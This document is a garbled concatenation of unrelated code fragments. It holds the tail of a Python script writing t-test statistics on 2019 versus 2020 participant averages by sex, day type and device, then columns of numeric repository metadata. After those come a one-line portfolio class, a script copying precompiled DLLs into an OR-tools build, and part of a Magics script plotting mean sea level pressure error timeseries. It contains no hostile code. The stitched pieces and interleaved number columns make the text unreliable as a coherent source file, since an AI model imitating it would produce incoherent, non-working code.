f.write("stdev_2020=")
f.write(str(participants_2020_female_weekdays_app['avg'].std(axis=0)))
f.write("\n \n")
f.write("Female weekdays Omron \n")
temp_test=str(scipy.stats.ttest_ind(participants_2019_female_weekdays_om['avg'],participants_2020_female_weekdays_om['avg'],axis=0,equal_var=False))
f.write(temp_test)
f.write("\n")
f.write("mean_2019=")
f.write(str(participants_2019_female_weekdays_om['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_2020=")
f.write(str(participants_2020_female_weekdays_om['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_2019=")
f.write(str(participants_2019_female_weekdays_om['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_2020=")
f.write(str(participants_2020_female_weekdays_om['avg'].std(axis=0)))
f.write("\n \n")
f.write("Female weekends app \n")
temp_test=str(scipy.stats.ttest_ind(participants_2019_female_weekends_app['avg'],participants_2020_female_weekends_app['avg'],axis=0,equal_var=False))
f.write(temp_test)
f.write("\n")
f.write("mean_2019=")
f.write(str(participants_2019_female_weekends_app['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_2020=")
f.write(str(participants_2020_female_weekends_app['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_2019=")
f.write(str(participants_2019_female_weekends_app['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_2020=")
f.write(str(participants_2020_female_weekends_app['avg'].std(axis=0)))
f.write("\n \n")
f.write("Female weekends Omron \n")
temp_test=str(scipy.stats.ttest_ind(participants_2019_female_weekends_om['avg'],participants_2020_female_weekends_om['avg'],axis=0,equal_var=False))
f.write(temp_test)
f.write("\n")
f.write("mean_2019=")
f.write(str(participants_2019_female_weekends_om['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_2020=")
f.write(str(participants_2020_female_weekends_om['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_2019=")
f.write(str(participants_2019_female_weekends_om['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_2020=")
f.write(str(participants_2020_female_weekends_om['avg'].std(axis=0)))
f.write("\n \n")
#########################################
#INTERNAL TESTS
#########################################
f.write("Internal weekdays app 2019 \n")
temp_test=str(scipy.stats.ttest_ind(participants_2019_female_weekdays_app['avg'],participants_2019_male_weekdays_app['avg'],axis=0,equal_var=False))
f.write(temp_test)
f.write("\n")
f.write("mean_female=")
f.write(str(participants_2019_female_weekdays_app['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_male=")
f.write(str(participants_2019_male_weekdays_app['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_female=")
f.write(str(participants_2019_female_weekdays_app['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_male=")
f.write(str(participants_2019_male_weekdays_app['avg'].std(axis=0)))
f.write("\n \n")
f.write("Internal weekdays Omron 2019 \n")
temp_test=str(scipy.stats.ttest_ind(participants_2019_female_weekdays_om['avg'],participants_2019_male_weekdays_om['avg'],axis=0,equal_var=False))
f.write(temp_test)
f.write("\n")
f.write("mean_female=")
f.write(str(participants_2019_female_weekdays_om['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_male=")
f.write(str(participants_2019_male_weekdays_om['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_female=")
f.write(str(participants_2019_female_weekdays_om['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_male=")
f.write(str(participants_2019_male_weekdays_om['avg'].std(axis=0)))
f.write("\n \n")
f.write("Internal weekdays app 2020 \n")
temp_test=str(scipy.stats.ttest_ind(participants_2020_female_weekdays_app['avg'],participants_2020_male_weekdays_app['avg'],axis=0,equal_var=False))
f.write(temp_test)
f.write("\n")
f.write("mean_female=")
f.write(str(participants_2020_female_weekdays_app['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_male=")
f.write(str(participants_2020_male_weekdays_app['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_female=")
f.write(str(participants_2020_female_weekdays_app['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_male=")
f.write(str(participants_2020_male_weekdays_app['avg'].std(axis=0)))
f.write("\n \n")
f.write("Internal weekdays Omron 2020 \n")
temp_test=str(scipy.stats.ttest_ind(participants_2020_female_weekdays_om['avg'],participants_2020_male_weekdays_om['avg'],axis=0,equal_var=False))
f.write(temp_test)
f.write("\n")
f.write("mean_female=")
f.write(str(participants_2020_female_weekdays_om['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_male=")
f.write(str(participants_2020_male_weekdays_om['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_female=")
f.write(str(participants_2020_female_weekdays_om['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_male=")
f.write(str(participants_2020_male_weekdays_om['avg'].std(axis=0)))
f.write("\n \n")
f.write("Internal weekends app 2019 \n")
temp_test=str(scipy.stats.ttest_ind(participants_2019_female_weekends_app['avg'],participants_2019_male_weekends_app['avg'],axis=0,equal_var=False))
f.write(temp_test)
f.write("\n")
f.write("mean_female=")
f.write(str(participants_2019_female_weekends_app['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_male=")
f.write(str(participants_2019_male_weekends_app['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_female=")
f.write(str(participants_2019_female_weekends_app['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_male=")
f.write(str(participants_2019_male_weekends_app['avg'].std(axis=0)))
f.write("\n \n")
f.write("Internal weekends Omron 2019 \n")
temp_test=str(scipy.stats.ttest_ind(participants_2019_female_weekends_om['avg'],participants_2019_male_weekends_om['avg'],axis=0,equal_var=False))
f.write(temp_test)
f.write("\n")
f.write("mean_female=")
f.write(str(participants_2019_female_weekends_om['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_male=")
f.write(str(participants_2019_male_weekends_om['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_female=")
f.write(str(participants_2019_female_weekends_om['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_male=")
f.write(str(participants_2019_male_weekends_om['avg'].std(axis=0)))
f.write("\n \n")
f.write("Internal weekends app 2020 \n")
temp_test=str(scipy.stats.ttest_ind(participants_2020_female_weekends_app['avg'],participants_2020_male_weekends_app['avg'],axis=0,equal_var=False))
f.write(temp_test)
f.write("\n")
f.write("mean_female=")
f.write(str(participants_2020_female_weekends_app['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_male=")
f.write(str(participants_2020_male_weekends_app['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_female=")
f.write(str(participants_2020_female_weekends_app['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_male=")
f.write(str(participants_2020_male_weekends_app['avg'].std(axis=0)))
f.write("\n \n")
f.write("Internal weekends Omron 2020 \n")
temp_test=str(scipy.stats.ttest_ind(participants_2020_female_weekends_om['avg'],participants_2020_male_weekends_om['avg'],axis=0,equal_var=False))
f.write(temp_test)
f.write("\n")
f.write("mean_female=")
f.write(str(participants_2020_female_weekends_om['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_male=")
f.write(str(participants_2020_male_weekends_om['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_female=")
f.write(str(participants_2020_female_weekends_om['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_male=")
f.write(str(participants_2020_male_weekends_om['avg'].std(axis=0)))
f.write("\n \n")
#########################################
#WEEKDAY VS WEEKEND
#########################################
f.write("Weekend vs weekdays overall app 2019 \n")
temp_test=str(scipy.stats.ttest_rel(participants_2019_weekdays_app['avg'],participants_2019_weekends_app['avg'],axis=0))
f.write(temp_test)
f.write("\n")
f.write("mean_weekdays=")
f.write(str(participants_2019_weekdays_app['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_weekends=")
f.write(str(participants_2019_weekends_app['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_weekdays=")
f.write(str(participants_2019_weekdays_app['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_weekends=")
f.write(str(participants_2019_weekends_app['avg'].std(axis=0)))
f.write("\n \n")
f.write("Weekend vs weekdays overall Omron 2019 \n")
temp_test=str(scipy.stats.ttest_rel(participants_2019_weekdays_om['avg'],participants_2019_weekends_om['avg'],axis=0))
f.write(temp_test)
f.write("\n")
f.write("mean_weekdays=")
f.write(str(participants_2019_weekdays_om['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_weekends=")
f.write(str(participants_2019_weekends_om['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_weekdays=")
f.write(str(participants_2019_weekdays_om['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_weekends=")
f.write(str(participants_2019_weekends_om['avg'].std(axis=0)))
f.write("\n \n")
f.write("Weekend vs weekdays overall app 2020 \n")
temp_test=str(scipy.stats.ttest_rel(participants_2020_weekdays_app['avg'],participants_2020_weekends_app['avg'],axis=0))
f.write(temp_test)
f.write("\n")
f.write("mean_weekdays=")
f.write(str(participants_2020_weekdays_app['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_weekends=")
f.write(str(participants_2020_weekends_app['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_weekdays=")
f.write(str(participants_2020_weekdays_app['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_weekends=")
f.write(str(participants_2020_weekends_app['avg'].std(axis=0)))
f.write("\n \n")
f.write("Weekend vs weekdays overall Omron 2020 \n")
temp_test=str(scipy.stats.ttest_rel(participants_2020_weekdays_om['avg'],participants_2020_weekends_om['avg'],axis=0))
f.write(temp_test)
f.write("\n")
f.write("mean_weekdays=")
f.write(str(participants_2020_weekdays_om['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_weekends=")
f.write(str(participants_2020_weekends_om['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_weekdays=")
f.write(str(participants_2020_weekdays_om['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_weekends=")
f.write(str(participants_2020_weekends_om['avg'].std(axis=0)))
f.write("\n \n")
f.write("Weekend vs weekdays males app 2019 \n")
temp_test=str(scipy.stats.ttest_rel(participants_2019_male_weekdays_app['avg'],participants_2019_male_weekends_app['avg'],axis=0))
f.write(temp_test)
f.write("\n")
f.write("mean_weekdays=")
f.write(str(participants_2019_male_weekdays_app['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_weekends=")
f.write(str(participants_2019_male_weekends_app['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_weekdays=")
f.write(str(participants_2019_male_weekdays_app['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_weekends=")
f.write(str(participants_2019_male_weekends_app['avg'].std(axis=0)))
f.write("\n \n")
f.write("Weekend vs weekdays males Omron 2019\n")
temp_test=str(scipy.stats.ttest_rel(participants_2019_male_weekdays_om['avg'],participants_2019_male_weekends_om['avg'],axis=0))
f.write(temp_test)
f.write("\n")
f.write("mean_weekdays=")
f.write(str(participants_2019_male_weekdays_om['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_weekends=")
f.write(str(participants_2019_male_weekends_om['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_weekdays=")
f.write(str(participants_2019_male_weekdays_om['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_weekends=")
f.write(str(participants_2019_male_weekends_om['avg'].std(axis=0)))
f.write("\n \n")
f.write("Weekend vs weekdays males app 2020\n")
temp_test=str(scipy.stats.ttest_rel(participants_2020_male_weekdays_app['avg'],participants_2020_male_weekends_app['avg'],axis=0))
f.write(temp_test)
f.write("\n")
f.write("mean_weekdays=")
f.write(str(participants_2020_male_weekdays_app['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_weekends=")
f.write(str(participants_2020_male_weekends_app['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_weekdays=")
f.write(str(participants_2020_male_weekdays_app['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_weekends=")
f.write(str(participants_2020_male_weekends_app['avg'].std(axis=0)))
f.write("\n \n")
f.write("Weekend vs weekdays males Omron 2020 \n")
temp_test=str(scipy.stats.ttest_rel(participants_2020_male_weekdays_om['avg'],participants_2020_male_weekends_om['avg'],axis=0))
f.write(temp_test)
f.write("\n")
f.write("mean_weekdays=")
f.write(str(participants_2020_male_weekdays_om['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_weekends=")
f.write(str(participants_2020_male_weekends_om['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_weekdays=")
f.write(str(participants_2020_male_weekdays_om['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_weekends=")
f.write(str(participants_2020_male_weekends_om['avg'].std(axis=0)))
f.write("\n \n")
f.write("Weekend vs weekdays females app 2019 \n")
temp_test=str(scipy.stats.ttest_rel(participants_2019_female_weekdays_app['avg'],participants_2019_female_weekends_app['avg'],axis=0))
f.write(temp_test)
f.write("\n")
f.write("mean_weekdays=")
f.write(str(participants_2019_female_weekdays_app['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_weekends=")
f.write(str(participants_2019_female_weekends_app['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_weekdays=")
f.write(str(participants_2019_female_weekdays_app['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_weekends=")
f.write(str(participants_2019_female_weekends_app['avg'].std(axis=0)))
f.write("\n \n")
f.write("Weekend vs weekdays females Omron 2019\n")
temp_test=str(scipy.stats.ttest_rel(participants_2019_female_weekdays_om['avg'],participants_2019_female_weekends_om['avg'],axis=0))
f.write(temp_test)
f.write("\n")
f.write("mean_weekdays=")
f.write(str(participants_2019_female_weekdays_om['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_weekends=")
f.write(str(participants_2019_female_weekends_om['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_weekdays=")
f.write(str(participants_2019_female_weekdays_om['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_weekends=")
f.write(str(participants_2019_female_weekends_om['avg'].std(axis=0)))
f.write("\n \n")
f.write("Weekend vs weekdays females app 2020\n")
temp_test=str(scipy.stats.ttest_rel(participants_2020_female_weekdays_app['avg'],participants_2020_female_weekends_app['avg'],axis=0))
f.write(temp_test)
f.write("\n")
f.write("mean_weekdays=")
f.write(str(participants_2020_female_weekdays_app['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_weekends=")
f.write(str(participants_2020_female_weekends_app['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_weekdays=")
f.write(str(participants_2020_female_weekdays_app['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_weekends=")
f.write(str(participants_2020_female_weekends_app['avg'].std(axis=0)))
f.write("\n \n")
f.write("Weekend vs weekdays females Omron 2020 \n")
temp_test=str(scipy.stats.ttest_rel(participants_2020_female_weekdays_om['avg'],participants_2020_female_weekends_om['avg'],axis=0))
f.write(temp_test)
f.write("\n")
f.write("mean_weekdays=")
f.write(str(participants_2020_female_weekdays_om['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_weekends=")
f.write(str(participants_2020_female_weekends_om['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_weekdays=")
f.write(str(participants_2020_female_weekdays_om['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_weekends=")
f.write(str(participants_2020_female_weekends_om['avg'].std(axis=0)))
f.write("\n \n")
f.close()
| 44.717881
| 227
| 0.769771
| 5,712
| 33,762
| 4.17577
| 0.020133
| 0.120745
| 0.046956
| 0.064565
| 0.971197
| 0.966083
| 0.930404
| 0.88219
| 0.866133
| 0.862527
| 0
| 0.06635
| 0.033085
| 33,762
| 755
| 228
| 44.717881
| 0.664298
| 0.026539
| 0
| 0.750397
| 0
| 0
| 0.24693
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.006359
| 0
| 0.006359
| 0.00318
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
49962efbaf31f4afb3bef2f6e9de1f577614f575
| 155
|
py
|
Python
|
Common/Measures/Portfolio/Timely/PortfolioQuarterly.py
|
enriqueescobar-askida/Kinito.Finance
|
5308748b64829ac798a858161f9b4a9e5829db44
|
[
"MIT"
] | 2
|
2020-03-04T11:18:38.000Z
|
2020-05-10T15:36:42.000Z
|
Common/Measures/Portfolio/Timely/PortfolioQuarterly.py
|
enriqueescobar-askida/Kinito.Finance
|
5308748b64829ac798a858161f9b4a9e5829db44
|
[
"MIT"
] | 6
|
2020-03-30T16:42:47.000Z
|
2021-12-13T20:37:21.000Z
|
Common/Measures/Portfolio/Timely/PortfolioQuarterly.py
|
enriqueescobar-askida/Kinito.Finance
|
5308748b64829ac798a858161f9b4a9e5829db44
|
[
"MIT"
] | 1
|
2020-04-14T11:26:16.000Z
|
2020-04-14T11:26:16.000Z
|
from Common.Measures.Portfolio.Timely.AbstractPortfolioTimely import AbstractPortfolioTimely
class PortfolioQuarterly(AbstractPortfolioTimely):
pass
| 25.833333
| 92
| 0.870968
| 12
| 155
| 11.25
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083871
| 155
| 5
| 93
| 31
| 0.950704
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
b8ecf181d77f8d2521461f8e8220f30b7a4fc56f
| 914
|
py
|
Python
|
csp_DRL/copy_pre_complied_files.py
|
songwenas12/csp-drl
|
dcc2320b08c397a9561242de4e24b569b71752fa
|
[
"Apache-2.0"
] | 3
|
2021-12-11T12:30:09.000Z
|
2021-12-30T09:49:45.000Z
|
csp_DRL/copy_pre_complied_files.py
|
songwenas12/csp-drl
|
dcc2320b08c397a9561242de4e24b569b71752fa
|
[
"Apache-2.0"
] | null | null | null |
csp_DRL/copy_pre_complied_files.py
|
songwenas12/csp-drl
|
dcc2320b08c397a9561242de4e24b569b71752fa
|
[
"Apache-2.0"
] | null | null | null |
import shutil
# Copy drlDLL.lib
shutil.copy2('./pre_compiled_libs/drlDLL.lib', '../or-tools-6.7.2-customized/ortools/constraint_solver')
# Copy the dlls
shutil.copy2('./pre_compiled_libs/drlDLL.dll', '../or-tools-6.7.2-customized/ortools/gen/ortools/constraint_solver')
shutil.copy2('./pre_compiled_libs/cublas64_100.dll', '../or-tools-6.7.2-customized/ortools/gen/ortools/constraint_solver')
shutil.copy2('./pre_compiled_libs/cudart64_100.dll', '../or-tools-6.7.2-customized/ortools/gen/ortools/constraint_solver')
shutil.copy2('./pre_compiled_libs/cusparse64_100.dll', '../or-tools-6.7.2-customized/ortools/gen/ortools/constraint_solver')
shutil.copy2('./pre_compiled_libs/libiomp5md.dll', '../or-tools-6.7.2-customized/ortools/gen/ortools/constraint_solver')
shutil.copy2('./pre_compiled_libs/tbb.dll', '../or-tools-6.7.2-customized/ortools/gen/ortools/constraint_solver')
print('Pre-compiled files copied.')
| 65.285714
| 124
| 0.777899
| 140
| 914
| 4.907143
| 0.221429
| 0.128093
| 0.142649
| 0.224163
| 0.823872
| 0.823872
| 0.730713
| 0.691412
| 0.691412
| 0.691412
| 0
| 0.049661
| 0.030635
| 914
| 14
| 125
| 65.285714
| 0.725734
| 0.031729
| 0
| 0
| 0
| 0
| 0.80068
| 0.771234
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.111111
| 0
| 0.111111
| 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
770805c663d876b8b5b5f27aec24228f38e624e1
| 133,206
|
py
|
Python
|
tools/versioncmp/examples/wmo_timeseries/wmo_timeseries_mslp.mcalls.py
|
dtip/magics
|
3247535760ca962f859c203295b508d442aca4ed
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
tools/versioncmp/examples/wmo_timeseries/wmo_timeseries_mslp.mcalls.py
|
dtip/magics
|
3247535760ca962f859c203295b508d442aca4ed
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
tools/versioncmp/examples/wmo_timeseries/wmo_timeseries_mslp.mcalls.py
|
dtip/magics
|
3247535760ca962f859c203295b508d442aca4ed
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2019-12-18T17:01:56.000Z
|
2019-12-18T17:01:56.000Z
|
# (C) Copyright 1996-2016 ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation nor
# does it submit to any jurisdiction.
import Magics as mpp
from numpy import *
mpp.init()
mpp.setc('output_format','ps')
mpp.setc('output_name','verify')
mpp.setc('subpage_map_projection','none')
mpp.setc('subpage_map_projection','none')
mpp.setr('page_x_length',29.7)
mpp.setr('page_y_length',21.0)
mpp.setr('super_page_x_length',29.7)
mpp.setc('page_id_line','off')
mpp.setc('page_id_line_user_text','Verify/MetPy devel')
mpp.setc('page_frame','on')
mpp.setr('super_page_y_length',21.0)
mpp.setr('page_x_length',29.7)
mpp.setc('layout','positional')
mpp.setr('page_x_position',0.0)
mpp.setr('page_y_position',0.0)
mpp.setr('page_y_length',21.0)
mpp.setc('page_frame','off')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setr('text_box_x_length',20.879099999999998)
mpp.setr('text_box_x_position',2.0344500000000005)
mpp.setr('text_box_y_length',5.586)
mpp.setc('subpage_frame','off')
mpp.setr('text_box_y_position',15.056999999999999)
mpp.setc('text_mode','positional')
mpp.setr('text_font_size',0.6)
mpp.setc('text_justification','left')
mpp.set1c('text_lines',['<font size="0.72"><b> </b></font>', ' <font size="0.54">Mean sea level pressure</font>', ' <font size="0.54">Root mean square error</font>', ' <font size="0.54">NHem Extratropics <font size=\'0.36\'>(lat 20.0 to 90.0, lon -180.0 to 180.0)</font></font>', ' <font size="0.54"> </font>', ' <font size="0.36">wmo_an od 0001 | 00UTC,verifying</font>'])
mpp.seti('text_line_count',6)
mpp.setc('text_html','on')
mpp.setc('text_colour','black')
mpp.text()
mpp.reset('text_mode')
mpp.reset('text_font_size')
mpp.reset('text_justification')
mpp.reset('text_lines')
mpp.reset('text_line_count')
mpp.reset('text_html')
mpp.reset('text_colour')
mpp.reset('text_box_x_length')
mpp.reset('text_box_x_position')
mpp.reset('text_box_y_length')
mpp.reset('subpage_frame')
mpp.reset('text_box_y_position')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setr('legend_box_x_position',16.335)
mpp.setc('legend_box_blanking','off')
mpp.setc('legend_text_composition','user_text_only')
mpp.setr('legend_box_y_position',15.120000000000001)
mpp.setr('legend_box_x_length',11.88)
mpp.setr('legend_box_x_length',11.88)
mpp.setr('legend_entry_text_width', 80.)
mpp.set1c('legend_user_lines',['ECMWF 12utc T+72', 'ECMWF 12utc T+120', 'JMA 12utc T+72', 'JMA 12utc T+120', 'UKMO 12utc T+72', 'UKMO 12utc T+120', 'NCEP 00utc T+72', 'NCEP 00utc T+120'])
mpp.seti('legend_column_count',2)
mpp.setr('legend_text_font_size',0.4)
mpp.setc('legend_box_mode','positional')
mpp.setc('legend_text_colour','black')
mpp.setr('legend_box_y_length',3.2)
mpp.setc('legend','on')
mpp.setc('legend_entry_plot_direction','column')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setr('subpage_x_length',25.541999999999998)
mpp.setr('subpage_x_position',2.97)
mpp.setc('layout','positional')
mpp.setr('subpage_y_position',2.3100000000000005)
mpp.setr('subpage_y_length',12.6)
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setr('subpage_horizontal_axis_height',1.5)
mpp.setr('axis_tick_interval',1.0)
mpp.setc('axis_months_label','off')
mpp.setc('axis_date_min_value','1989-01-01')
mpp.setc('axis_type','date')
mpp.setc('axis_tick_label_position','inter_tick')
mpp.setc('axis_years_label','on')
mpp.setc('axis_title','off')
mpp.setc('axis_grid','on')
mpp.setr('axis_days_label_height',0.4)
mpp.setr('axis_months_label_height',0.4)
mpp.setc('axis_date_max_value','2010-12-01')
mpp.setc('axis_grid_line_style','dot')
mpp.setc('axis_date_type','years')
mpp.setr('axis_years_label_height',0.4)
mpp.setc('axis_minor_tick','off')
mpp.setc('axis_grid_colour','black')
mpp.setc('axis_days_label','off')
mpp.setc('subpage_map_projection','none')
mpp.axis()
mpp.reset('axis_tick_interval')
mpp.reset('axis_months_label')
mpp.reset('axis_date_min_value')
mpp.reset('axis_type')
mpp.reset('axis_tick_label_position')
mpp.reset('axis_years_label')
mpp.reset('axis_title')
mpp.reset('axis_grid')
mpp.reset('axis_days_label_height')
mpp.reset('axis_months_label_height')
mpp.reset('axis_date_max_value')
mpp.reset('axis_grid_line_style')
mpp.reset('axis_date_type')
mpp.reset('axis_years_label_height')
mpp.reset('axis_minor_tick')
mpp.reset('axis_grid_colour')
mpp.reset('axis_days_label')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setr('subpage_vertical_axis_width',1.5)
mpp.setc('axis_title_text','hPa')
mpp.setr('axis_tick_label_height',0.4)
mpp.setc('axis_orientation','vertical')
mpp.setr('axis_tick_size',0.175)
mpp.setr('axis_tick_interval',1.0)
mpp.setr('axis_title_height',0.4)
mpp.setr('axis_max_value',10.0)
mpp.setc('axis_grid','on')
mpp.setc('axis_grid_line_style','dot')
mpp.setc('axis_grid_colour','black')
mpp.setr('axis_min_value',1.0)
mpp.setc('subpage_map_projection','none')
mpp.axis()
mpp.reset('axis_title_text')
mpp.reset('axis_tick_label_height')
mpp.reset('axis_orientation')
mpp.reset('axis_tick_size')
mpp.reset('axis_tick_interval')
mpp.reset('axis_title_height')
mpp.reset('axis_max_value')
mpp.reset('axis_grid')
mpp.reset('axis_grid_line_style')
mpp.reset('axis_grid_colour')
mpp.reset('axis_min_value')
mpp.setr('graph_y_missing_value', 1.70000000e+38)
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setc('graph_line_colour','red')
